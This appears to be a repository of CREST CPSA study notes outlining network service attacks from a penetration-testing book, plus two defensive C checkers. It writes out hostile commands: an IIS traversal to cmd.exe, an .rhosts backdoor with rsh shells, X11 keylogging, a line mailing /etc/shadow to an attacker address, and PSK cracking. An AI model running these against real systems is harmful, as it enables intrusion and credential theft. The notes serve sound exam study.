application firewalls 526 | • Encoding and obfuscating attack code - Hex coding, Double-Hex coding and HTML UTF-8 and Hex coding 527 | • HTTP request smuggling - directory traversal attack against Microsoft IIS (CVE-2000-0884) 528 | http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 529 | 530 | 531 | 532 | Web Application Vulnerabilities 533 | Authentication Issues - Default/Guessable accounts, HTTP Form Brute-Force and Session Management Weakness 534 | Parameter Modification - Command Injection, Filesystem Access and Cross-site Scripting (BeEF and XSS-Proxy) 535 | 536 | Web Security Checklist - Page 221 537 | 538 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 539 | ================================================================================================== 540 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 541 | 542 | CHAPTER 8 - Assessing Remote Maintenance Services 543 | 544 | Remote Maintenance Services - Info Leak, Brute Force and Process manipulation (BOF) 545 | ftp 21/tcp 546 | ssh 22/tcp 547 | telnet 23/tcp 548 | exec 512/tcp 549 | login 513/tcp 550 | shell 514/tcp 551 | x11 6000/tcp 552 | citrix-ica 1494/tcp 553 | citrix-ica-brws 1604/udp 554 | ms-rdp 3389/tcp 555 | vnc-http 5800/tcp 556 | vnc 5900/tcp 557 | 558 | FTP - FTP Banner Grabbing 559 | Brute-Force, 560 | FTP Bounce Attacks (nmap -P0 -b username:password@ftp-server:port) 561 | PORT COMMAND (1039) and PASV COMMAND Abuse (BOF) 562 | FTP Process Manipulation - (CVE-2001-0249) Valid User names via 'CWD ~username' 563 | PAGE 235,236,237 564 | 565 | SSH - Fingerprinting 566 | Brute-force Password Grinding 567 | PAGE 239 568 | 569 | Telnet - Fingerprinting - Tools such as TelnetFP (Automated) 570 | Brute-force Password Grinding - Common device telnet password 
571 | PAGE 244 572 | 573 | R-Services - exec 512/tcp 574 | login 513/tcp 575 | shell 514/tcp 576 | Commands - rsh (Rsh service doesn’t assign any process ), rlogin and rexec 577 | # Simple backdoor 578 | $ echo + + > /usr/bin/.rhosts 579 | $ exit 580 | $ rsh -l bin 192.168.0.20 csh -i 581 | Brute-force - $ rsh -l bin 192.168.0.20 csh -i 582 | Spoofing RSH Connections 583 | PAGE 249 584 | 585 | X Windows - (TCP ports 6000 to 6063) 586 | Authentication Mechanism - xhost and xauth 587 | Xhost - Host-based X authentication allows users to specify which IP addresses and hosts have access to the X server. The xhost command is used with + and - options to allow and deny X access from individual hosts (i.e., xhost +192.168.189.4). 588 | Xauth - Magic Cookie is placed into the .xauthority file under the user home dir. 589 | $ xauth list 590 | $ xauth add onyx.example.org:0 MIT-MAGIC-COOKIE-1 d5d3634d2e6d64b1c078aee61ea846b5 # Creating 591 | Accessing X Servers - Tools such as xscan 592 | $ xwininfo -tree -root -display 192.168.189.66:0 | grep -i term # List Open Window 593 | $ xwd -root -display 192.168.189.66:0 | xwud # Take SS - Entire window. 
Also using xwatchwin 594 | $ xwd -id 0x2c00005 -display 192.168.189.66:0 | xwud # Take SS 595 | $ ./xsnoop -h 0x2c00005 -d 192.168.189.66:0 # Keylogg 596 | $ ./xspy -display 192.168.189.66:0 # Keylogg - Entire window 597 | $ ./xpusher -h 0x2c00005 -display 192.168.189.66:0mail evilhacker@hotmail.com < /etc/shadow #send keystr 598 | $ ./xtester 0x2c00005 192.168.189.66:0mail evilhacker@hotmail.com < /etc/shadow # Send keystrokes to 0x2 599 | PAGE 253 600 | 601 | Citrix (TCP 1494/UDP port 1604) - Using the Citrix ICA Client 602 | Accessing Nonpublic Published Applications - Citrix-pa-scan 603 | $ ./citrix-pa-scan 212.123.69.1 604 | PAGE 257 605 | 606 | Microsoft Remote Desktop Protocol (RDP) - TCP 3389 607 | Brute-force 608 | Vulnerabilities - CVE-2000-1149 RegAPI.DLL overflow in Windows NT 4.0 Terminal Server allows remote attackers to execute arbitrary commands via a long username. 609 | 610 | VNC (5900 Viewer/5800 HTTP) 611 | Brute-force - Vncrack and VNCrackx4 612 | Page 262 613 | 614 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 615 | 616 | CHAPTER 9 - Assessing Database Services 617 | 618 | ms-sql 1433/tcp 619 | ms-sql-ssrs 1434/udp (SQL Server Resolution Service) 620 | ms-sql-hidden 2433/tcp 621 | oracle-tns 1521/tcp (Transparent Network Substrate) 622 | oracle-tns-alt 1526/tcp 623 | oracle-tns-alt 1541/tcp 624 | mysql 3306/tcp 625 | 626 | 627 | Microsoft SQL Server 628 | Enumeration - Using SQLPing, Metacoretex (Automatic) 629 | Brute-Force -sqlbf, SQLAT and Forcesql 630 | PAGE 268 631 | 632 | Oracle 633 | Enumeration - Pinging the TNS Listener and Information Leak attack(tnscmd.pl) 634 | PAGE 273 635 | Brute Force and Post Auth Issue - Using OAT, Metacoretex 636 | PAGE 275 637 | 638 | MYSQL 639 | Enumeration - Simple connection Netcat or Telnet 640 | Brute Force - Hydra 641 | PAGE 278- 279 642 | 643 | 
---------------------------------------------------------------------------------------------------------------------------------------------------------------- 644 | ================================================================================================== 645 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 646 | 647 | CHAPTER 10 - Assessing Windows Networking Services 648 | 649 | loc-srv 135/tcp 650 | loc-srv 135/udp 651 | netbios-ns 137/udp 652 | netbios-dgm 138/udp 653 | netbios-ssn 139/tcp 654 | microsoft-ds 445/tcp 655 | microsoft-ds 445/udp 656 | 657 | Port 135 is used for RPC client-server communication, and ports 139 and 445 are used for authentication and file sharing. UDP ports 137 and 138 are used for local NetBIOS browser, naming, and lookup functions. 658 | 659 | Microsoft RPC Services 660 | Enumeration - Tools such as epdump, rpctools (rpcdump and ifids) and Rpcscan 661 | Identify Vulnerable - PAGE 289 662 | User details via SAMR and LSARPC - Tools such as walksam and rpclient, enumdomusers 663 | Brute-Forcing Administrator Passwords - Tools such as WMICracker 664 | Enumerating System Details Through WMI - Tools such as WMIdump 665 | Executing Arbitrary Commands - Tools such as Remoxec 666 | 667 | The NetBIOS Name Service (UDP 137) 668 | Enumerating - nbtstat 669 | Attacking - CVE-2003-0661 NBNS in Windows NT 4.0, 2000, XP, and Server 2003 may include random memory in a response to a NBNS query, which can allow remote attackers to obtain sensitive information. CVE-2000-0673 NBNS doesn’t perform authentication, which allows remote attackers to cause a denial-of-service by sending a spoofed Name Conflict or Name Releasedatagram. CVE-1999-0288 Malformed NBNS traffic results in WINS crash. 
670 | 671 | The NetBIOS Datagram Service (UDP 138) - CVE-2000-1079 672 | 673 | The NetBIOS Session Service 674 | Enumeration - enum, winfo and GetAcct 675 | Brute force - SMBCrack and SMB-at 676 | Authenticating with NetBIOS - net use 677 | Executing Commands - schtasks 678 | Access and Modify Registry Keys - regdmp (Dumps), regini (set and modify reg keys) and reg (Delete reg keys) 679 | Access the SAM Database - pwdump3, Cain, John, Winrtgen, Ophcrack and rainbowcrack 680 | 681 | The CIFS Service (T/U-445) 682 | Enumeration - smbdumpusers 683 | Brute Force - smbbf 684 | 685 | Unix Samba Vulnerabilities - PAGE 313 686 | 687 | Windows Networking Services Countermeasures - PAGE 313 688 | 689 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 690 | 691 | CHAPTER 11 - Assessing Email Services 692 | 693 | Normal 694 | smtp 25/tcp 695 | pop2 109/tcp 696 | pop3 110/tcp 697 | imap2 143/tcp 698 | submission 587/tcp 699 | SSL-wrapped versions 700 | smtps 465/tcp 701 | imaps 993/tcp 702 | pop3s 995/tcp 703 | 704 | SMTP 705 | Fingerprinting - smtpmail 706 | Enum Enabled SMTP Subsystems and Features - Using telnet and then EHLO world 707 | Brute force - Auth is done as LOGIN(base64), PLAIN and CRAM-MD5 708 | Using HYDRA 709 | NTLM overflows through SMTP authentication - If NTLM authentication is supported, LSASS overflows (CVE-2003-0818 and CVE2003-0533) can be launched to execute arbitrary code server-side. 
    Open Relay Testing - PAGE 319
    Sendmail Assessment - information leaks via EXPN (expands an alias or address), VRFY and RCPT TO, or automated with Brutus
    Sendmail process manipulation vulnerabilities - PAGE 323
    Microsoft SMTP Service Assessment - PAGE 324
    SMTP Content Checking Circumvention - PAGE 325

POP-2 and POP-3
    POP-3 Brute force
    POP-3 Process Manipulation Attacks - PAGE 328

IMAP
    Brute Force - PAGE 329 and 330

Email Services Countermeasures - PAGE 330

----------------------------------------------------------------------------------------------------------------------------------------------------------------

CHAPTER 12 - Assessing IP VPN Services

Standard Internet Protocol (IP) packets are inherently insecure. Most IPsec implementations use the Internet Key Exchange (IKE) service to provide authentication and key exchange when establishing and maintaining an IPsec connection. After authenticating and negotiating keying material through IKE, a Security Association (SA) is established between the client and the IPsec server.

IPsec - IKE + Authentication Header (AH) + Encapsulating Security Payload (ESP)

ISAKMP and IKE
    Internet Security Association and Key Management Protocol (ISAKMP) - UDP 500
    IKE supports 3 authentication methods - pre-shared keys (PSK), public key encryption and digital signatures.
    IKE uses 2 phases - Phase 1 authenticates the peer and establishes the ISAKMP SA; Phase 2 establishes an IPsec SA.
    IKE Phase 1 - Main mode and aggressive mode
    IKE Phase 2 - Quick mode

Main Mode - One key exchange using Diffie-Hellman (DH) to generate a mutual secret key; protects the identity of the client and the data.
    6 messages are sent -
    Message 1: An IKE SA (not to be confused with an IPsec SA) proposal is sent to initiate the key exchange mechanism.
    Message 2: The IKE SA is accepted.
    Messages 3 and 4: DH public values (KE) are exchanged, along with a random nonce payload for each party (Ni and Nr). From this exchange a mutual secret key is computed; from this point on, the shared keys derived from the DH exchange are used to encrypt IKE payloads.
    Messages 5 and 6: Authentication data (AUTH) is sent, protected by the DH shared secret generated previously. The identification of the parties (IDii and IDir) is also protected.
    Note: the DH computation happens after the first messages, so the peer IDs are sent encrypted.

Aggressive Mode - Only 3 messages are sent; the peer ID is sent in clear text; used for remote-access VPNs.
    Messages sent are -
    Message 1: An IKE SA proposal is sent, along with a DH public value (KE), random nonce data (Ni) and identity information (IDii). Because the identity is passed in the first packet, before the DH exchange has completed, it cannot be encrypted.
    Message 2: The IKE SA is accepted, and the responder's DH public value is sent, along with a nonce (Nr), identity information (IDir) and an authentication payload (AUTH).
    Message 3: Authentication information is sent back, protected by the DH secret key derived previously.
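
As an added example (my code, not from the book or these notes), a C checker that takes a Phase 1 proposal in the ike-scan --trans numbering these notes use and flags what a defender would want removed: DES, MD5, MODP 768, and PSK accepted in aggressive mode, where the identity travels in the clear as described above. Which values count as weak is my own policy assumption.

```c
/* Added example, not from the book or these notes: assess an IKE Phase 1
 * proposal given in the ike-scan --trans numbering used in these notes
 * (enc,hash,auth,group; AES as 7/keylen). The weakness policy is my own. */
#include <stdio.h>
#include <string.h>

struct ike_proposal {
    int enc;     /* 1 DES, 5 3DES, 7 AES */
    int keylen;  /* AES key length in bits from the 7/128 form, else 0 */
    int hash;    /* 1 MD5, 2 SHA1 */
    int auth;    /* 1 PSK, 3 RSA signature, 64221 hybrid, 65001 XAUTH */
    int group;   /* 1 MODP 768, 2 MODP 1024, 5 MODP 1536 */
};

/* Parse "5,2,1,2" or "7/256,2,3,5". Returns 1 on success, 0 if malformed. */
int parse_trans(const char *s, struct ike_proposal *p)
{
    memset(p, 0, sizeof *p);
    if (sscanf(s, "%d/%d,%d,%d,%d", &p->enc, &p->keylen, &p->hash, &p->auth, &p->group) == 5)
        return 1;
    return sscanf(s, "%d,%d,%d,%d", &p->enc, &p->hash, &p->auth, &p->group) == 4;
}

#define NOTE(msg) do { strncat(out, msg, len - strlen(out) - 1); n++; } while (0)

/* Write the weaknesses into `out` and return how many were found. `aggressive`
 * says the responder accepted this proposal in aggressive mode, where the
 * identity travels in clear and a PSK-based exchange can be attacked offline. */
int assess_proposal(const struct ike_proposal *p, int aggressive, char *out, size_t len)
{
    int n = 0;
    out[0] = '\0';
    if (p->enc == 1) NOTE("DES encryption; ");
    if (p->hash == 1) NOTE("MD5 hash; ");
    if (p->group == 1) NOTE("MODP 768 DH group; ");
    if (p->auth == 1 && aggressive) NOTE("PSK accepted in aggressive mode; ");
    return n;
}

/* Convenience wrapper: -1 for a malformed string, otherwise the finding count. */
int assess_trans(const char *trans, int aggressive)
{
    struct ike_proposal p;
    char findings[256];
    if (!parse_trans(trans, &p)) return -1;
    int n = assess_proposal(&p, aggressive, findings, sizeof findings);
    printf("%-12s %-10s %s\n", trans, aggressive ? "aggressive" : "main", n ? findings : "no findings");
    return n;
}
```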

Attacking IPsec VPNs
    IPsec Service Endpoint Enumeration - tools such as ike-scan
    IPsec Service Endpoint Fingerprinting - tools such as ike-scan
    Supported Transform Enumeration - tools such as ike-scan
        Values for the --trans fields in ike-scan (e.g. $ ike-scan -M --trans=5,2,1,2 10.0.0.254), in the order encryption, hash, authentication, DH group:
        • Encryption Algorithm: 1 (DES), 5 (3DES), 7/128 (128-bit AES) and 7/256 (256-bit AES)
        • Hash Algorithm: 1 (MD5) and 2 (SHA1)
        • Authentication Method: 1 (PSK), 3 (RSA signature), 64221 (hybrid mode) and 65001 (XAUTH)
        • DH Group: 1 (MODP 768), 2 (MODP 1024) and 5 (MODP 1536)
    Investigating Known Weaknesses - PAGE 341
    Denial-of-Service Vulnerabilities - malformed IKE packet DoS (CVE-2005-1802); negotiation slot exhaustion attack (CVE-2006-3906)
    Aggressive Mode IKE PSK User Enumeration - $ ike-scan --aggressive --multiline --id=royhills@hotmail.com 10.0.0.254
    Aggressive Mode IKE PSK Cracking -
        $ ike-scan --aggressive --multiline --id=royhills@hotmail.com --pskcrack=netscreen.psk 10.0.0.254
        then $ psk-crack netscreen.psk

Microsoft PPTP - Microsoft's Point-to-Point Tunnelling Protocol (PPTP) uses TCP port 1723.
    Due to protocol complexity and reliance on MS-CHAP for authentication, PPTPv1 and PPTPv2 are vulnerable to several offline cryptographic attacks.
    Tools such as thc-pptp-bruter ($ cat wordlist | thc-pptp-bruter 192.168.0.5)

SSL VPNs - TCP 443, using only a web browser on the client side
    Basic SSL Querying - $ openssl s_client -connect 172.16.2.2:443
    Enumerating Weak Cipher Support - list the cipher suites with $ openssl ciphers ALL:eNULL
        Ciphers used:
            RC4-MD5, which is a strong cipher using 128-bit RC4 encryption
            EXP-RC4-MD5, which is a weak cipher using exportable (40-bit) RC4
            NULL-MD5, which performs no encryption at all
        Then test whether the server accepts a given cipher: $ openssl s_client -cipher RC4-MD5 -connect 172.16.3.18:443 (replace RC4-MD5 with the cipher under test)
    Known SSL Vulnerabilities - PAGE 353
        SSL implementation exploits - CVE-2000-0719 (Microsoft SSL PCT overflow, MS04-011); CVE-2003-0818 (Microsoft ASN.1 heap overflow)
        SSL VPN web interface issues -
            CVE-2006-5416 - F5 FirePass 1000 SSL VPN 5.5 cross-site scripting issue
            CVE-2006-1357 - F5 FirePass 4100 SSL VPN 5.4.2 cross-site scripting issue
            CVE-2005-4197 - Nortel SSL VPN 4.2.1.6 OS command execution vulnerability

VPN Services Countermeasures - PAGE 354

----------------------------------------------------------------------------------------------------------------------------------------------------------------

CHAPTER 13 - Assessing Unix RPC Services

Remote Procedure Call (RPC) - the portmapper listens on TCP and UDP port 111, and sometimes on TCP and UDP port 32771.

Enumerating Unix RPC Services - $ rpcinfo -p 192.168.0.50
    Services seen include status (rpc.statd), nlockmgr (rpc.lockd), nfsd, rquotad and rusersd

Identifying RPC Services Without Portmapper Access - $ nmap -sR 10.0.0.9

Connecting to RPC Services Without Portmapper Access - $ showmount -e 10.0.0.9

RPC Service Vulnerabilities - PAGE 358
    Integer overflows - CVE-2003-0028 and CVE-2002-0391, with multiple attack vectors including rpc.cmsd, ttdbserverd and dmispd.
Abusing NFS and rpc.mountd (100005) -
    CVE-2003-0252 - xlog() function of the mountd service bundled with multiple Linux distributions (including Debian 8.0, Slackware 8.1 and Red Hat Linux 6.2) as part of the nfs-utils-1.0.3 package
    CVE-1999-0832 - Red Hat Linux 5.2 and Debian 2.1 and earlier, relating to the rpc.nfsd service (as part of the nfs-server-2.2beta46 package), November 1999
    CVE-1999-0002 - NFS mountd service bundled with Red Hat Linux 5.1 (as part of the nfs-server-2.2beta29 package)
    Listing and accessing exported directories through mountd and NFS -
        $ showmount -e 10.0.0.6
        $ mount 10.0.0.6:/home /mnt
        $ cd jarvis
        $ echo + + > .rhosts
        $ cd /
        $ umount /mnt
        $ rsh -l jarvis 10.0.0.6 csh -i
Multiple Vendor rpc.statd (100024) Vulnerabilities -
    CVE-2000-0666 - Red Hat 6.2, Mandrake 7.1 and other Linux distributions (lsx.tgz, statdx2.tar.gz and rpc-statd.c)
    CVE-1999-0493 - Solaris 2.5.1 (statd.tar.gz)
    CVE-1999-0018 and CVE-1999-0019 - Solaris 2.4, IRIX, AIX and HP-UX (dropstatd, Solaris binary)
Solaris rpc.sadmind (100232) Vulnerabilities -
    CVE-1999-0977 - the sadmind service running on Solaris 2.6 and 2.7 can be exploited by issuing a crafted RPC request, resulting in a stack overflow
    CVE-2003-0722 - sadmind authentication weakness, e.g. $ perl rootdown.pl -h 10.0.0.9 -i
Multiple Vendor rpc.cmsd (100068) Vulnerabilities - PAGE 362
Multiple Vendor rpc.ttdbserverd (100083) Vulnerabilities - PAGE 363

Unix RPC Services Countermeasures - PAGE 364

----------------------------------------------------------------------------------------------------------------------------------------------------------------

CHAPTER 14 - Application-Level Risks

Network Service Vulnerabilities and Attacks
    Memory Manipulation Attacks - buffer overflows (BOF), integer overflows and format string bugs

Runtime Memory Organization - overwriting values within memory
    (R)   The text segment - contains all compiled executable code
    (RW)  The data and BSS (Block Started by Symbol) segments - contain all global variables for the program
    (RWE) The stack - dynamically stores and manipulates function variables (temporary storage)
    The heap - stores data that must exist after a function returns (and its variables)
        Allocator - malloc()
        Deallocator - free()
    Processor Registers and Memory - memory holds compiled machine code for execution, global variables (data and BSS), local variables and pointers, and other data (heap). The processor reads and interprets values in memory by using registers. A register is an internal processor value that increments and jumps to point to memory addresses used during program execution. 3 registers matter here: eip (the instruction pointer), ebp (the stack frame pointer) and esp (the stack pointer). The stack pointer should always point to the last address on the stack as it grows and shrinks in size, and the stack frame pointer defines the start of the current function's stack frame. The instruction pointer is an important register that points to compiled executable code (usually in the text segment) for execution by the processor.
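
An added C example (my code, not from the book or these notes) of the integer-overflow delivery mechanism this chapter covers: the allocation size count * element size wraps in 32 bits so malloc() receives a tiny buffer, shown beside the checked version a defender wants in place. The 4-byte count header, 4-byte records and sample messages are constructed for the demo.

```c
/* Added example, not from the book or these notes: the integer-overflow
 * "delivery mechanism" for a heap overflow, as a wrapping allocation size
 * beside a checked one. The count header and 4-byte records are a toy format. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define RECORD_SIZE 4u  /* count * RECORD_SIZE is the value that reaches malloc() */

/* Vulnerable pattern: the product wraps in 32 bits, so count 0x40000001 yields a
 * 4-byte allocation while a loop trusting `count` writes far past it. */
uint32_t unsafe_alloc_size(uint32_t count, uint32_t elem_size)
{
    return count * elem_size;  /* modulo 2^32 */
}

/* Hardened: refuse the multiplication when the result cannot be represented. */
int checked_mul_u32(uint32_t count, uint32_t elem_size, uint32_t *out)
{
    if (elem_size != 0 && count > UINT32_MAX / elem_size)
        return 0;  /* would wrap */
    *out = count * elem_size;
    return 1;
}

/* Parse "big-endian count, then records": allocate exactly the bytes the
 * records need, copy them, and return the count. Returns -1 if the product
 * wraps (hostile header) or the body is shorter than the header claims. */
int64_t load_records(const unsigned char *msg, size_t msg_len)
{
    uint32_t count, bytes;
    unsigned char *buf;
    if (msg_len < 4) return -1;
    count = ((uint32_t)msg[0] << 24) | ((uint32_t)msg[1] << 16) |
            ((uint32_t)msg[2] << 8) | msg[3];
    if (!checked_mul_u32(count, RECORD_SIZE, &bytes)) return -1;  /* wrap */
    if (bytes > msg_len - 4) return -1;                          /* truncated */
    buf = malloc(bytes ? bytes : 1);
    if (buf == NULL) return -1;
    memcpy(buf, msg + 4, bytes);  /* bounded by the checked size, never by count */
    free(buf);                    /* a real parser would hand buf to its caller */
    return (int64_t)count;
}

/* Constructed samples: a wrapping count, and a well-formed two-record message. */
const unsigned char HOSTILE_MSG[] = { 0x40, 0x00, 0x00, 0x01, 1, 2, 3, 4 };
const unsigned char GOOD_MSG[] = { 0x00, 0x00, 0x00, 0x02,
                                   0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe };
```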

Classic Buffer-Overflow Vulnerabilities (Stack Based)
    Stack Overflow - by overflowing data on the stack
    Stack smash (saved instruction pointer overwrite) - crashing the program, compromising the logical program flow (using shellcode), analyzing the program crash (using gdb), creating and injecting shellcode
    Stack off-by-one (saved frame pointer overwrite) - a length check that is off by one
        Analyzing the program crash; exploiting an off-by-one bug to modify the instruction pointer; exploiting an off-by-one bug to modify data in the parent function's stack frame; off-by-one effectiveness against different processor architectures

Heap Overflows (non-stack based; depends on the OS heap implementation)
    Other Heap Corruption Attacks - heap off-by-one and off-by-five bugs, double-free bugs

Integer Overflows - a delivery mechanism for a stack, heap or static overflow to occur (depending on where the integer ends up in memory)
    Heap Wrap-Around Attacks - OpenSSH 3.3 (CVE-2002-0639)
    Negative-Size Bugs - supplying a negative size value as input

Format String Bugs - a user can control the format parameter to a function such as printf() or syslog().
    Reading adjacent items on the stack; reading data from any address on the stack; overwriting any word in memory

Mitigating Process Manipulation Risks
    Here are the five main approaches:
    • Nonexecutable stack and heap implementation
    • Use of canary values in memory - a canary value is a hashed word that is known by the system and checked during execution
    • Running unusual server architecture
    • Compiling applications from source
    • Active system call monitoring - IDS

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Network Security Assessment
After getting heavy demand on my CREST CPSA, I am sharing my notes on Network Security Assessment from the recommended book for CPSA. Please don't keep your knowledge limited to my notes; I might have missed something important for someone because I already knew about it.

You can check the NSA.txt file; it has some missing screenshots, so refer to the book and the image below.

----------------

I am uploading the book PDF for Page Number References - https://drive.google.com/drive/folders/1gkG6mR3_a3AJfWZQm3kDpD2MxCLAYlQX?usp=sharing

![image](https://github.com/ahrixia/Crest_CPSA/assets/35935843/8b4fbf6f-aadc-4651-97b5-9feec1a87fcc)
--------------------------------------------------------------------------------